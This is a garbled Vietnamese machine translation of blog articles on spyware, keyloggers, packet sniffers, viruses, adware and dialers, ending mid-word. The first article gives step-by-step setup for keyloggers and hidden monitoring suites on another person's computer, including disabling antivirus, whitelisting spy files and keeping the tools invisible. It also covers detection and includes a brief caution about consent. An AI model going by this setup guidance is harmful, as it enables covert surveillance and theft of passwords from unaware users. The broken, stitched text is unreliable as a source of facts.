Trojan trong bàn ủi Trung Quốc: tại sao hải quan không cho phép Andrey Vasilkov Xuất bản ngày 28 tháng 10 năm 2013 Cuối tuần trước, một ghi chú xuất hiện trên trang web Vesti.Ru về việc các nhân viên hải quan Nga đã phát hiện ra việc nhét gián điệp trong một lô hàng bàn là từ Trung Quốc.

Từ cuốn sách của tác giả

Trojan tuyên bố bản quyền: làm thế nào để không ẩn giấu các công cụ khai thác Bitcoin Andrey Vasilkov Xuất bản ngày 20 tháng 12 năm 2013 Trong các tác phẩm văn học, tội phạm là những thiên tài độc ác đặt ra thách thức trí tuệ đối với công lý và những bộ óc tốt nhất

Đôi khi điều quan trọng là phải biết điều gì đang xảy ra với máy tính khi bạn vắng mặt. Ai làm gì trên đó, bao gồm những trang web và chương trình nào. Các chương trình gián điệp đặc biệt có thể báo cáo tất cả những điều này.

Ít nhất thì việc theo dõi ai đó là không tốt. Hoặc thậm chí có thể bị trừng phạt hình sự (vi phạm quyền bảo mật và tất cả những thứ đó)... Tuy nhiên, đôi khi sẽ không có hại gì nếu biết, chẳng hạn như con bạn đang làm gì trên máy tính khi bạn vắng mặt hoặc nhân viên trong tổ chức của bạn làm gì đang làm khi không có ông chủ. Hoặc có thể họ đang theo dõi bạn?!!

Máy tính và thiêt bị di động từ lâu đã phải đối mặt với những mối nguy hiểm từ đủ loại virus. Tuy nhiên, có một loại phần mềm, không độc hại, có thể thực hiện các chức năng tương tự, chẳng hạn như Trojan - ghi nhật ký các lần khởi chạy ứng dụng trên hệ thống, ghi lại tất cả các lần nhấn phím trên bàn phím, định kỳ chụp ảnh màn hình và sau đó gửi tất cả thông tin được thu thập cho người cài đặt và cấu hình giám sát người dùng.

Như bạn đã hiểu, hôm nay chúng ta sẽ nói cụ thể về phần mềm gián điệp, hoạt động và phương pháp phát hiện của chúng.

Sự khác biệt từ virus

Trên đồng ruộng giải pháp chống virus Loại phần mềm gián điệp được gọi là “phần mềm gián điệp” (từ tiếng Anh “spy” - “spy” và viết tắt “software” - “software”). Về nguyên tắc, một số ứng dụng sẽ được thảo luận dưới đây bị phần mềm chống vi-rút coi là độc hại, nhưng thực tế thì không phải vậy.

Sự khác biệt giữa phần mềm gián điệp thực sự và chương trình theo dõi máy tính là gì? Sự khác biệt chính ở đây là ở phạm vi và phương thức hoạt động. Virus phần mềm gián điệp được cài đặt trên hệ thống mà người dùng không hề hay biết và có thể đóng vai trò là nguồn gây ra các mối đe dọa bổ sung (ví dụ: trộm cắp và hỏng dữ liệu).

Các chương trình phần mềm gián điệp để giám sát máy tính được người dùng tự cài đặt để tìm hiểu xem người dùng khác đang làm gì trên PC. Đồng thời, bản thân người dùng có thể biết rằng họ đang bị theo dõi (ví dụ, việc này được thực hiện ở một số cơ sở để ghi lại thời gian làm việc của nhân viên).

Tuy nhiên xét về nguyên tắc hoạt động phần mềm gián điệp, trên thực tế, không khác gì bất kỳ Trojan, keylogger hay backdoor nào... Vì vậy, chúng ta có thể coi chúng là một số loại “vi-rút đào tẩu” đã chuyển sang “phe nhẹ” và không được sử dụng nhiều để đánh cắp thông tin từ một hệ thống. PC, nhưng để kiểm soát công việc của mình.

Nhân tiện, ở phương Tây có thói quen giới thiệu phần mềm theo dõi trên máy tính của người dùng mạng công ty và trên PC ở nhà là khá phổ biến. Thậm chí còn có một tên riêng cho loại chương trình này - "phần mềm theo dõi", ít nhất trên danh nghĩa cho phép tách chúng khỏi phần mềm gián điệp độc hại.

Keylogger

Loại phần mềm gián điệp phổ biến nhất và ở một mức độ nhất định nguy hiểm là keylogger (từ tiếng Anh “key” - “button” và “logger” - “recorder”). Hơn nữa, các chương trình này có thể giống như virus độc lập, được triển khai vào hệ thống và các tiện ích theo dõi được cài đặt đặc biệt. Về cơ bản không có sự khác biệt giữa chúng.

Keylogger được thiết kế để ghi lại các lần nhấn tất cả các nút trên bàn phím (đôi khi cả chuột) và lưu dữ liệu vào một tệp. Tùy thuộc vào nguyên tắc hoạt động của từng keylogger cụ thể, tập tin có thể được lưu trữ đơn giản trên ổ cứng cục bộ hoặc gửi định kỳ cho người tiến hành giám sát.

Như vậy, không cần nghi ngờ bất cứ điều gì, chúng ta có thể “trao” tất cả mật khẩu của mình cho bên thứ ba có thể sử dụng chúng cho bất kỳ mục đích nào. Ví dụ: kẻ tấn công có thể hack tài khoản của chúng tôi, thay đổi mật khẩu truy cập và/hoặc bán lại chúng cho ai đó...

May mắn thay, hầu hết các keylogger đều nhanh chóng được hầu hết các phần mềm chống vi-rút phát hiện vì chúng đang chặn dữ liệu một cách đáng ngờ. Tuy nhiên, nếu keylogger được quản trị viên cài đặt, rất có thể nó sẽ được đưa vào các trường hợp ngoại lệ và sẽ không bị phát hiện...

Một ví dụ nổi bật về keylogger miễn phí là SC-KeyLog:

Thật không may, keylogger này bị phần mềm chống vi-rút phát hiện ở giai đoạn tải xuống. Vì vậy, nếu bạn quyết định cài đặt nó, hãy tạm thời tắt tính năng bảo vệ cho đến khi bạn thêm các tệp cần thiết vào " Danh sách trắng":

  • tệp thực thi chương trình (mặc định: C:\Program Files\Soft-Central\SC-KeyLog\SC-KeyLog2.exe);
  • tệp thực thi của mô-đun theo dõi, tệp này sẽ được bạn tạo trong thư mục được chỉ định;
  • thư viện (tệp DLL) để xử lý dữ liệu ẩn, tên mà bạn cũng đặt ở giai đoạn cài đặt và được lưu trữ theo mặc định trong thư mục C:\Windows\System32\.

Sau khi cài đặt, bạn sẽ được đưa đến trình hướng dẫn thiết lập. Ở đây bạn có thể hỏi địa chỉ gửi thư, tệp dữ liệu nào sẽ được gửi đến, đặt tên và vị trí lưu mô-đun thực thi chặn các lần nhấn phím được đề cập ở trên, cũng như mật khẩu cần thiết để mở nhật ký.

Khi tất cả các cài đặt được thực hiện và các tập tin keylogger được liệt kê chương trình đáng tin cậy chống virus, mọi thứ đã sẵn sàng hoạt động. Đây là một ví dụ về những gì bạn có thể thấy trong tệp nhật ký:

Như bạn có thể thấy, SC-KeyLog hiển thị tiêu đề của tất cả các cửa sổ mà người dùng làm việc, nhấn nút chuột và trên thực tế là bàn phím (bao gồm cả các phím dịch vụ). Điều đáng chú ý là chương trình không thể xác định bố cục và hiển thị tất cả văn bản bằng chữ cái tiếng Anh, vẫn cần được chuyển đổi thành dạng tiếng Nga có thể đọc được (ví dụ:).

Tuy nhiên, chức năng keylogger có thể bị ẩn ngay cả trong những phần mềm không chuyên dụng phổ biến. Một ví dụ nổi bật về điều này là chương trình thay đổi bố cục văn bản Punto Switcher:

Một trong chức năng bổ sung Chương trình này là "Nhật ký", được kích hoạt thủ công và trên thực tế, là một keylogger thực sự có chức năng chặn và ghi nhớ tất cả dữ liệu được nhập từ bàn phím. Trong trường hợp này, văn bản được lưu trong bố cục bắt buộc và điều duy nhất còn thiếu là chặn các sự kiện chuột và nhấn các phím bàn phím đặc biệt.

Thêm Punto Switcher như một keylogger ở chỗ nó không bị phần mềm chống vi-rút phát hiện và được cài đặt trên nhiều máy tính. Theo đó, nếu cần, bạn có thể kích hoạt tính năng theo dõi mà không cần cài đặt bất kỳ phần mềm hay thủ thuật bổ sung nào!

Điệp viên phức tạp

Keylogger sẽ hoạt động tốt nếu bạn chỉ cần biết người dùng nhập gì từ bàn phím và chương trình nào anh ta khởi chạy. Tuy nhiên, dữ liệu này có thể không đủ. Do đó, các hệ thống phần mềm phức tạp hơn đã được tạo ra để phục vụ hoạt động gián điệp toàn diện. Những phức hợp gián điệp như vậy có thể bao gồm:

  • keylogger;
  • chặn clipboard;
  • gián điệp màn hình (chụp ảnh màn hình theo các khoảng thời gian được chỉ định);
  • khởi động chương trình và ghi hoạt động;
  • hệ thống ghi âm, ghi hình (nếu có micro, webcam).

Để bạn có thể hình dung rõ hơn cách thức hoạt động của các chương trình như vậy, hãy xem xét một vài giải pháp miễn phí của hướng này. Và hệ thống đầu tiên trong số đó sẽ là một hệ thống giám sát miễn phí bằng tiếng Nga có tên (chú ý, phần mềm chống vi-rút và trình duyệt có thể chặn quyền truy cập vào trang web!):

Các tính năng của chương trình bao gồm:

  • chặn tổ hợp phím bàn phím;
  • chụp ảnh màn hình (theo mặc định là quá thường xuyên);
  • giám sát chạy chương trình và thời gian hoạt động của họ;
  • Giám sát hoạt động của PC và tài khoản người dùng.

Than ôi, tổ hợp theo dõi PC này cũng bị phần mềm chống vi-rút phát hiện, vì vậy để tải xuống và cài đặt nó, trước tiên bạn phải tắt tính năng bảo vệ. Trong quá trình cài đặt, chúng ta sẽ cần thiết lập tổ hợp phím để gọi giao diện chương trình, cũng như mật khẩu để truy cập dữ liệu đã thu thập. Sau khi cài đặt hoàn tất, hãy thêm toàn bộ thư mục chứa phần mềm gián điệp vào “danh sách trắng” chống vi-rút. mặc định C:\Documents and Cài đặt\Tất cả người dùng\Dữ liệu ứng dụng\Softex) và bạn có thể kích hoạt lại tính năng bảo vệ.

Softex Expert Home sẽ ra mắt vào năm lý lịch và sẽ không tạo bất kỳ phím tắt hoặc biểu tượng hoạt động nào ở bất kỳ đâu. Chỉ có thể phát hiện hoạt động của nó bằng cách nhấn tổ hợp phím nóng mà bạn đã chỉ định. Trong cửa sổ xuất hiện, hãy nhập mật khẩu truy cập, trước hết hãy chuyển đến phần “Cài đặt” trên tab “Ảnh chụp màn hình” và tăng khoảng thời gian tối thiểu giữa các lần chụp, cũng như khoảng thời gian hẹn giờ (theo mặc định là 2 và 10 giây, tương ứng).

Một gián điệp như vậy là khá đủ để giám sát máy tính ở nhà của bạn. Ngoài các tính năng đã được đề cập ở trên, Expert Home còn có chức năng xem số liệu thống kê từ xa, cho phép bạn xem nhật ký qua Internet. Để kích hoạt nó, chỉ cần nhấp vào nút kết nối với máy chủ trong phần “Giám sát Internet”, sau đó đợi ID máy tính và mật khẩu truy cập được cấp mà bạn sẽ cần nhập trên trang web của nhà phát triển:

Điều cần làm rõ là ở chế độ miễn phí, số liệu thống kê chỉ được lưu trữ trên máy chủ trong một ngày. Nếu bạn muốn truy cập thêm thời gian dài, thì bạn sẽ phải trả từ 250 (7 ngày) đến 1000 (30 ngày) rúp mỗi tháng.

Một chương trình giám sát máy tính toàn diện miễn phí khác là:

Mặc dù tên của chương trình có chứa từ "keylogger", nhưng trên thực tế, nó có nhiều khả năng hơn. Trong số đó:

Bản thân chương trình không bị phần mềm chống vi-rút phát hiện, tuy nhiên, với các thuật toán heuristic tích cực, hoạt động “đáng ngờ” của nó sẽ được phát hiện. Vì vậy, tốt nhất bạn nên cài đặt và cấu hình nó khi tính năng bảo vệ bị vô hiệu hóa.

Ở giai đoạn cài đặt, không cần chuẩn bị sơ bộ (điều duy nhất bạn cần là chọn chương trình sẽ được cài đặt cho ai và liệu biểu tượng của nó có hiển thị trong khay hay không). Tuy nhiên, sau khi cài đặt, bạn cần thêm thư mục chương trình (theo mặc định là C:\WINDOWS\system32\Mpk) và tệp thực thi MPKView.exe của nó vào phần loại trừ chống vi-rút.

Khi bạn khởi chạy nó lần đầu tiên, cửa sổ cài đặt sẽ mở ra. Ở đây, chúng tôi có thể thay đổi ngôn ngữ từ tiếng Anh sang tiếng Ukraina, chẳng hạn như tiếng Ukraina (vì lý do nào đó không có tiếng Nga...), đặt các phím riêng để gọi nhanh chương trình (theo mặc định ALT+CTRL+SHIFT+K) và mật khẩu để vào bảng điều khiển.

Thực ra đó là tất cả. Nhược điểm chính của phiên bản miễn phí của chương trình là những hạn chế trong một số khía cạnh theo dõi (chẳng hạn như không phải tất cả các chương trình đều có sẵn), cũng như không có khả năng gửi nhật ký qua thư hoặc qua FTP. Nếu không thì hầu hết mọi thứ đều tốt.

Phần mềm gián điệp không chỉ dành cho máy tính để bàn, mà còn dành cho nền tảng di động. Nếu muốn biết con mình đang làm gì trên máy tính bảng hoặc điện thoại thông minh, bạn có thể thử sử dụng hệ thống theo dõi đa nền tảng miễn phí KidLogger.

người đánh hơi

Phương tiện gián điệp cuối cùng và xảo quyệt nhất có thể được gọi là máy đánh hơi (từ tiếng Anh “sniff” - “sniff out”). Lớp chương trình này được gọi một cách khoa học là “máy phân tích lưu lượng truy cập” và được sử dụng để chặn và phân tích dữ liệu được truyền qua Internet.

Bằng cách sử dụng trình thám thính, kẻ tấn công có thể kết nối với phiên web hiện tại của người dùng và sử dụng nó cho mục đích riêng của mình thay mặt cho người dùng bằng cách thay thế các gói dữ liệu. Nếu bạn không may mắn, thì với sự trợ giúp của một kẻ đánh hơi, chúng có thể "đánh cắp" thông tin đăng nhập và mật khẩu của bạn để vào bất kỳ trang web nào không sử dụng mã hóa lưu lượng truy cập.

Những người sử dụng mạng công cộng này hoặc mạng công cộng khác (ví dụ: điểm truy cập Wi-Fi) để truy cập Internet có nhiều nguy cơ trở thành nạn nhân của kẻ đánh hơi. Ngoài ra, người dùng mạng công ty có quản trị viên quá “kinh doanh” có thể bị đe dọa về mặt lý thuyết.

Để bạn có thể hiểu đại khái thế nào là sniffer, tôi khuyên bạn nên xem xét một đại diện của loại chương trình này được phát triển bởi nhóm nổi tiếng NirSoft:

Trình thám thính này chủ yếu nhằm mục đích chặn các gói dữ liệu trên PC cục bộ và phục vụ nhiều mục đích tốt hơn (như gỡ lỗi mạng). Nhưng bản chất của nó cũng giống như các công cụ của hacker.

Một người hiểu được nguyên tắc truyền dữ liệu qua giao thức mạng và hiểu loại thông tin nào được truyền trong một gói cụ thể, có thể giải mã nội dung của nó và nếu muốn, thay thế nó bằng cách gửi yêu cầu đã sửa đổi đến máy chủ. Nếu kết nối qua kênh HTTP đơn giản không được mã hóa thì hacker có thể thấy mật khẩu của bạn ngay trong cửa sổ sniffer mà không cần phải giải mã bất cứ điều gì!

Vấn đề càng trở nên trầm trọng hơn bởi trước đây chỉ có các trình đánh hơi dành cho hệ điều hành máy tính để bàn. Ví dụ: ngày nay có rất nhiều trình thám thính dành cho Android. Do đó, kẻ tấn công phân tích lưu lượng truy cập thực tế có thể ở bất cứ đâu (ngay cả ở bàn bên cạnh trong quán cà phê có Wi-Fi miễn phí! Một ví dụ nổi bật về trình thám thính dành cho Android là phiên bản di động của trình thám thính phổ biến WireShark:

Bằng cách sử dụng trình thám thính này và chương trình phân tích nhật ký Shark Reader, kẻ tấn công có thể chặn dữ liệu trực tiếp từ điện thoại thông minh hoặc máy tính bảng được kết nối với điểm truy cập công cộng.

Chống gián điệp

Vì vậy, chúng tôi đã tìm hiểu cách hoạt động của các loại phần mềm gián điệp chính. Và một câu hỏi hợp lý được đặt ra: “Làm thế nào bạn có thể bảo vệ mình khỏi sự giám sát?”... Đây là một nhiệm vụ “khó khăn nhưng có thể thực hiện được”.

Như bạn có thể thấy, hầu hết tất cả các chương trình phần mềm gián điệp đều có thể bị phần mềm chống vi-rút phát hiện. Vì vậy bước đầu tiên là cập nhật cơ sở dữ liệu chống virus phần mềm bảo mật được cài đặt trên bạn. Ngoài ra, hãy nhớ mở “danh sách trắng” của gói chống vi-rút của bạn và xem liệu nó có cho phép các tệp có tên đáng ngờ nằm ​​trong thư mục hệ thống hay không.

Nếu bạn sử dụng Bộ chuyển đổi Punto đã đề cập (hoặc các thiết bị tương tự của nó), hãy nhớ kiểm tra xem có ai đó đã bật “Nhật ký” mà bạn không biết hay không.

Nếu không tìm thấy tham số đáng ngờ nào trong cài đặt chống vi-rút hoặc trong Punto Switcher, bạn có thể sử dụng cách quét hệ thống bằng các trình quét chống vi-rút đặc biệt. Tôi khuyên bạn nên sử dụng các chương trình mà cá nhân tôi đã thử nghiệm nhiều lần và .

Ngoài ra, bạn có thể kiểm tra các tiến trình hiện đang chạy bằng cách sử dụng đặc biệt người điều phối chống vi-rút nhiệm vụ. Một ví dụ về điều này có thể được gọi tiện ích miễn phí. Công cụ này cho phép bạn không chỉ xem tên và địa chỉ của tất cả các tiến trình đang chạy mà còn nhanh chóng đánh giá mức độ độc hại của chúng (thậm chí là tiềm ẩn).

Điều khó nhất là chống lại những kẻ đánh hơi. Nếu bạn không thể từ chối hoàn toàn việc sử dụng mạng công cộng, thì loại bảo vệ duy nhất có thể là sử dụng các trang web hỗ trợ giao thức truyền dữ liệu HTTPS được mã hóa (hầu hết các mạng xã hội hiện nay đều có giao thức này). Nếu trang web hoặc dịch vụ bạn cần không hỗ trợ mã hóa thì phương án cuối cùng là bạn có thể tổ chức một đường hầm truyền dữ liệu an toàn bằng VPN.

kết luận

Như bạn có thể thấy, việc cài đặt và giám sát bất kỳ máy tính nào không quá khó. Hơn nữa, điều này có thể được thực hiện hoàn toàn miễn phí bằng cách sử dụng các chương trình nhỏ. Vì vậy, nếu bạn sử dụng mạng công cộng hoặc bạn làm việc trên một PC được nhiều người dùng sử dụng thì về mặt lý thuyết, rất có thể bạn đã bị theo dõi.

Sự bất cẩn và tin tưởng quá mức có thể khiến bạn ít nhất bị mất mật khẩu từ tài khoản của mình trên mạng xã hội và trong trường hợp xấu nhất, chẳng hạn như bị đánh cắp tiền trên tài khoản của bạn. tài khoản điện tử. Vì vậy, điều quan trọng là phải tuân theo nguyên tắc “tin cậy nhưng xác minh”.

Nếu bản thân bạn quyết định theo dõi máy tính của ai đó thì bạn phải thành thật cảnh báo người dùng về điều này. Ngược lại, nếu phát hiện gián điệp, bạn có thể gặp rất nhiều rắc rối trong đầu :) Vì vậy, trước khi làm gián điệp, hãy suy nghĩ kỹ về điều đó!

tái bút Được phép tự do sao chép và trích dẫn. bài viết này với điều kiện là một liên kết hoạt động mở tới nguồn được chỉ định và quyền tác giả của Ruslan Tertyshny được giữ nguyên.

Virus, gián điệp và trình quay số: ai, tại sao và như thế nào

Tôi nghĩ rằng nếu bạn hỏi bất kỳ học sinh nào ngày nay lavsan là gì, thì cậu ấy sẽ không nói cho bạn về “một loại sợi tổng hợp thu được bằng quá trình đa ngưng tụ ethylene glycol và axit thơm dibasic”. Không, câu trả lời của anh ấy sẽ như thế này: “Lo-vesan, hay còn gọi là msblast, xâm nhập vào dòng hệ điều hành Microsoft Windows NT bằng cách sử dụng lỗ hổng trong dịch vụ Microsoft Windows DCOM RPC.” Tôi sợ phải đoán sau một thời gian sẽ có mối liên hệ nào với từ diệt vong. Rõ ràng không chỉ với trò chơi cùng tên.

Như bạn có thể hiểu từ tiêu đề và phần giới thiệu, cuộc trò chuyện hôm nay sẽ nói về virus và các loại virus tương tự. Trước khi chuyển sang câu trả lời cho các câu hỏi đặt ra trong tiêu đề, hôm nay tôi xin điểm qua trực tiếp các “vị khách” của chúng ta. Ở đây câu trả lời sẽ được đưa ra về cách tất cả những thứ này xâm nhập vào máy tính của chúng tôi.

Virus
Virus là những chương trình có một số hậu quả phá hoại. Và không quan trọng chúng là gì: mọi thứ đều có thể xảy ra ở đây - từ sự thay đổi tầm thường về quyền đối với tệp và làm hỏng nội dung bên trong của nó cho đến sự gián đoạn Internet và sự cố của hệ điều hành. Virus còn có nghĩa là một chương trình không chỉ mang chức năng phá hoại mà còn có khả năng sinh sản. Đây là những gì một cuốn sách thông minh nói về điều này: “Đặc tính bắt buộc (cần thiết) của virus máy tính là khả năng tạo các bản sao của chính nó (không nhất thiết phải giống với bản gốc) và đưa chúng vào mạng máy tính và/hoặc các tệp, khu vực hệ thống. của máy tính và các đối tượng thực thi khác, đồng thời, các bản sao vẫn có khả năng lây lan thêm" ((c) Evgeniy Kaspersky. "Virus máy tính"). Thật vậy, để tồn tại, virus cần phải nhân lên và điều này đã được chứng minh bằng khoa học như sinh học. Nhân tiện, chính từ những loại virus sinh học này mà cái tên virus máy tính bắt nguồn từ đó. Và bản thân chúng hoàn toàn biện minh cho cái tên của mình: tất cả các loại vi-rút đều đơn giản và tuy nhiên, bất chấp nỗ lực của các công ty chống vi-rút, những công ty có chi phí được tính toán rất lớn, chúng vẫn tồn tại và phát triển. Bạn không cần phải tìm đâu xa để tìm ví dụ: hãy lấy ví dụ như một loại vi-rút như I-Worm.Mydoom.b. Đã bao nhiêu lần họ nói rằng bạn không nên mở các tệp đính kèm từ những người không quen biết và nên xử lý thận trọng các tin nhắn từ những người đã biết, đặc biệt nếu bạn không đồng ý với điều này. Ngoài ra, nếu nội dung của bức thư có nội dung như sau: “Hãy xem bức ảnh tuyệt vời của bạn gái tôi” thì nó sẽ ngay lập tức được gửi vào thùng rác. Nhưng nếu trong ví dụ trên văn bản vẫn có ý nghĩa thì nội dung của những bức thư bị nhiễm mydoom khá lạ lùng.

Tin nhắn không thể được biểu diễn bằng mã hóa ASCII 7 bit và đã được gửi dưới dạng daemon gửi thư đính kèm nhị phân được báo cáo: Đã xảy ra lỗi #804 trong phiên SMTP. Đã nhận được một phần tin nhắn. Tin nhắn chứa các ký tự Unicode và đã được gửi dưới dạng tệp đính kèm nhị phân. Tin nhắn chứa đồ họa được mã hóa MIME và đã được gửi dưới dạng tệp đính kèm nhị phân. Giao dịch qua thư không thành công. Tin nhắn một phần có sẵn.

Bức thư chứa một tệp có 9 tùy chọn tên tệp đính kèm và 5 tùy chọn phần mở rộng. Hai biến thể đã đến hộp thư đến của tôi. Đầu tiên là một kho lưu trữ zip có tệp tài liệu được cho là và thứ hai là một exe đơn giản với biểu tượng được thay thế bằng biểu tượng notepad. Nếu trong trường hợp thứ hai, bất kỳ người dùng nào cũng có thể nhận thấy điểm bắt bằng cách nhìn vào độ phân giải, thì trong trường hợp đầu tiên, nó. thì khó làm như vậy hơn. Tôi có xu hướng quy số lượng lây nhiễm lớn nhất cho trường hợp đầu tiên. Tôi sẽ không cho bạn biết loại virus này làm gì, bởi vì điều này đã được nói nhiều lần trong các ấn phẩm in và tài nguyên trực tuyến. của Mydoom, chúng tôi đã tìm hiểu về phương pháp lây lan virus đầu tiên - thông qua email.

Hãy xem phương pháp tiếp theo sử dụng Worm.Win32.Lovesan (còn được gọi là msblast) làm ví dụ. Điều gì đáng chú ý về loại virus này và tại sao việc lây nhiễm nó lại trở nên phổ biến? Cá nhân này đáng chú ý ở chỗ, về nguyên tắc, nó không ảnh hưởng đến hiệu suất của toàn bộ hệ thống. Một máy tính bị nhiễm nó đơn giản là không thể lướt Internet bình thường. Sau một thời gian, thông báo lỗi RPC hiện lên, sau đó máy tính khởi động lại. Nhiễm trùng xảy ra như thế nào? Virus này khai thác lỗ hổng trong dịch vụ DCOM RPC trong Microsoft Windows 2000/XP/2003 và xâm nhập vào máy tính của người dùng thông qua cổng 135 của một địa chỉ IP cụ thể. Làm thế nào kẻ tấn công tìm ra chính xác địa chỉ của bạn? Vâng, rất đơn giản. Hiện nay có rất nhiều máy quét IP được viết ra đến nỗi ngay cả trẻ mẫu giáo cũng có thể dễ dàng tìm ra địa chỉ IP và xem xét. cổng mở, qua đó bạn có thể tải virus xuống máy tính của mình. Để rõ ràng, tôi sẽ chứng minh sự lây nhiễm xảy ra trực tiếp với virus Lovesan như thế nào. Sâu quét địa chỉ IP để tìm các cổng mở và không được bảo vệ. Quá trình này được thể hiện trong sơ đồ:

20.40.50.0
20.40.50.1
20.40.50.2
...
20.40.50.19
----------- tạm dừng 1,8 giây
20.40.50.20
...
20.40.50.39
----------- tạm dừng 1,8 giây
...
20.40.51.0
20.40.51.1
...
20.41.0.0
20.41.0.1
và tiếp tục với tinh thần tương tự hơn nữa.

Sâu chọn một trong hai phương pháp để quét. Phương pháp một: quét địa chỉ cơ sở ngẫu nhiên (A.B.C.D), trong đó D là 0 và A, B, C được chọn ngẫu nhiên trong phạm vi 1-255. Phạm vi quét như sau: ...0.
Phương pháp hai: sâu xác định địa chỉ máy tính cục bộ(A.B.C.D), đặt D về 0 và chọn giá trị C. Nếu C lớn hơn 20 thì sâu sẽ chọn số ngẫu nhiên từ 1 đến 20. Nếu C nhỏ hơn hoặc bằng 20 thì sâu không thay đổi giá trị đó. Vì vậy, cách lây lan virus thứ hai là thông qua các cổng máy tính không được bảo vệ, sử dụng các lỗ hổng trong phần mềm.
Phương pháp thứ ba là thông qua Internet, khi bạn tải xuống các tệp (ở phiên bản mong muốn hoặc không mong muốn). Một lần nữa, tôi sẽ giải thích bằng các ví dụ. Một ví dụ về những gì mong muốn. Bạn tải xuống một số trò đùa, chương trình hoặc trò chơi mới từ Internet và nó bị nhiễm vi-rút. Sau khi tải xuống, chương trình/trò chơi/trò đùa sẽ bắt đầu và - thì đấy - bạn là chủ sở hữu của vi-rút. Tôi có thể nói gì? Hãy cảnh giác, thường xuyên cập nhật cơ sở dữ liệu chống vi-rút của bạn, quét tất cả các chương trình bằng phần mềm chống vi-rút và ít nhất đừng quên những điều cơ bản về bảo mật máy tính. Ai đó có thể nói: "Ví dụ, tại sao tôi phải quét các chương trình không thể bị nhiễm vi-rút?" Tôi muốn hỏi: “Đây là những loại chương trình gì?” Bất kỳ chương trình nào cũng có thể bị lây nhiễm, đặc biệt nếu chúng được tải xuống từ Varezniks hoặc trang web của các nhóm hacker.

Bây giờ hãy chuyển sang phần tải xuống không mong muốn. Tôi sẽ nhấn mạnh hai loại tải như vậy. Đầu tiên: khi người dùng thậm chí không nghi ngờ rằng thứ gì đó đang được tải xuống máy tính của mình. Việc tải xuống này được thực hiện bằng cách thực thi các tập lệnh. Loại tải xuống không mong muốn thứ hai là khi tải xuống sai thứ gì đó. Tôi sẽ cho bạn một ví dụ. Tại một thời điểm, một trang web có vết nứt, ngay trước khi tải xuống tệp, đã đề xuất cài đặt “Thanh XXX miễn phí” hoặc “bẻ khóa Internet 100%”. Nếu người dùng đồng ý với điều này (và tôi chắc chắn rằng có những người như vậy, bởi vì tôi vẫn nhớ câu hỏi của tháng trong “Niềm vui ảo” về “100% crack Internet”), thì một Trojan hoặc vi-rút đã được tải xuống. Sự khác biệt về nguyên tắc là nhỏ. Tuy nhiên, đây không phải là điều thú vị nhất: nếu một lời đề nghị hấp dẫn như vậy bị từ chối, một dấu hiệu sẽ bật lên với dòng chữ như sau: “Lỗi trang web” và nút OK hoặc Tiếp tục, khi nhấp vào đó, Trojan vẫn sẽ được tải xuống , mặc dù người dùng không hề biết. Và chỉ có tường lửa mới có thể cứu bạn khỏi điều này.
Virus có thể có những tác dụng phụ nào, ngoài chức năng phá hoại chính? Một trong những “ứng dụng miễn phí” là chức năng DOS (Từ chối dịch vụ) tấn công vào bất kỳ trang web nào. Trong hầu hết các trường hợp, nạn nhân là trang web của các công ty chống vi-rút, trang web chống thư rác và - làm sao có thể nếu không có điều này - trang web của những người chịu đựng lâu dài Microsoft. Một tác dụng phụ khác là việc cài đặt thành phần cửa sau, nhờ đó kẻ tấn công có được toàn quyền kiểm soát máy tính của người dùng. Không khó để đoán điều này đe dọa điều gì.

gián điệp
Nhóm tiếp theo bao gồm phần mềm gián điệp và nhóm này cũng bao gồm các mô-đun quảng cáo. Cách chính để phân phối các chương trình kiểu này là cài đặt chúng như một thành phần, thường không thể tách rời, vào một chương trình. Ngoài ra, còn có hành vi tải xuống không mong muốn (xem mô tả ở trên) và tải xuống cookie theo dõi.
Những cá nhân này làm gì? Hãy bắt đầu với những điểm chung giữa phần mềm gián điệp và phần mềm quảng cáo. Cả hai loại đều thu thập thông tin về người dùng và máy tính của anh ta, theo dõi hành động của anh ta, một loại gián điệp - reylogger - cũng ghi lại mọi thứ bạn gõ trên bàn phím vào một tệp. Hoạt động của bạn trên Internet cũng được theo dõi: những gì bạn truy cập, nơi bạn nán lại. nhiều nhất, liên kết nào bạn nhấp vào. Sau khi thu thập dữ liệu, tất cả thông tin sẽ được gửi đến chủ sở hữu. Và ở đây, đường dẫn của gián điệp và mô-đun quảng cáo sẽ khác nhau sau khi dữ liệu được thu thập bởi các mô-đun quảng cáo, thông tin thường được bán lại nhiều nhất. một bên thứ ba, người sẽ nghiên cứu nó một cách cẩn thận. Sau đó, trong trường hợp tốt nhất, một loại chương trình chính sách Internet sẽ được soạn thảo: cung cấp những gì, treo quảng cáo của bạn ở đâu. Nhưng đây là trường hợp tốt nhất và trong trường hợp tốt nhất. trường hợp xấu nhất, mega/kg/tấn thư rác sẽ bắt đầu đổ vào hộp thư của bạn.

Điệp viên khác nhau như thế nào? Sau khi nghiên cứu dữ liệu của cùng một reylogger, kẻ tấn công có thể tìm ra dữ liệu cá nhân, bí mật nghiêm ngặt của bạn mà sau đó hắn có thể sử dụng để tống tiền. Và những trường hợp như vậy đã xảy ra. điểm yếu trong hệ thống để sử dụng tất cả những thứ này để cài đặt Trojan và các thành phần cửa sau. Điều này đe dọa điều gì, hãy đọc ở trên.

Trình quay số
Các phương pháp thâm nhập của chúng không khác với những phương pháp được mô tả ở trên. Vì vậy, chúng ta hãy ngay lập tức chuyển sang việc xem xét. Ở đây cần phải đặt trước rằng có những trình quay số hoàn toàn yên bình, thường được gọi là “trình quay số”. Các chương trình này được sử dụng để giúp người dùng quay số liên hệ với nhà cung cấp và nếu có thể, duy trì kết nối ổn định với anh ta ngay cả trên các đường dây cũ hoặc “hiện đại hóa”. Những chương trình mà chúng ta sẽ nói đến có một tên khác - sử dụng trình quay số chiến đấu. những lỗ hổng trong hệ điều hành và đôi khi do sự sơ suất hoặc ngây thơ của người dùng (xem phần trên về 100% crack của Internet), các chương trình này thay thế điện thoại của nhà cung cấp bằng điện thoại của một nhà khai thác viễn thông từ một quốc gia xa lạ nào đó. Trong trường hợp, chiếc điện thoại cũ tốt của nhà cung cấp vẫn còn trong cửa sổ quay số. Trình quay số cũng ghi vào bộ lập lịch nhiệm vụ gọi vào một thời điểm nhất định và thật tốt nếu người dùng có thói quen tắt modem hoặc có modem bên ngoài. và la hét nhiều đến nỗi mẹ chỉ lo lắng về nỗi đau của anh sau khi nhận được hóa đơn điện thoại lớn như vậy.

Ai
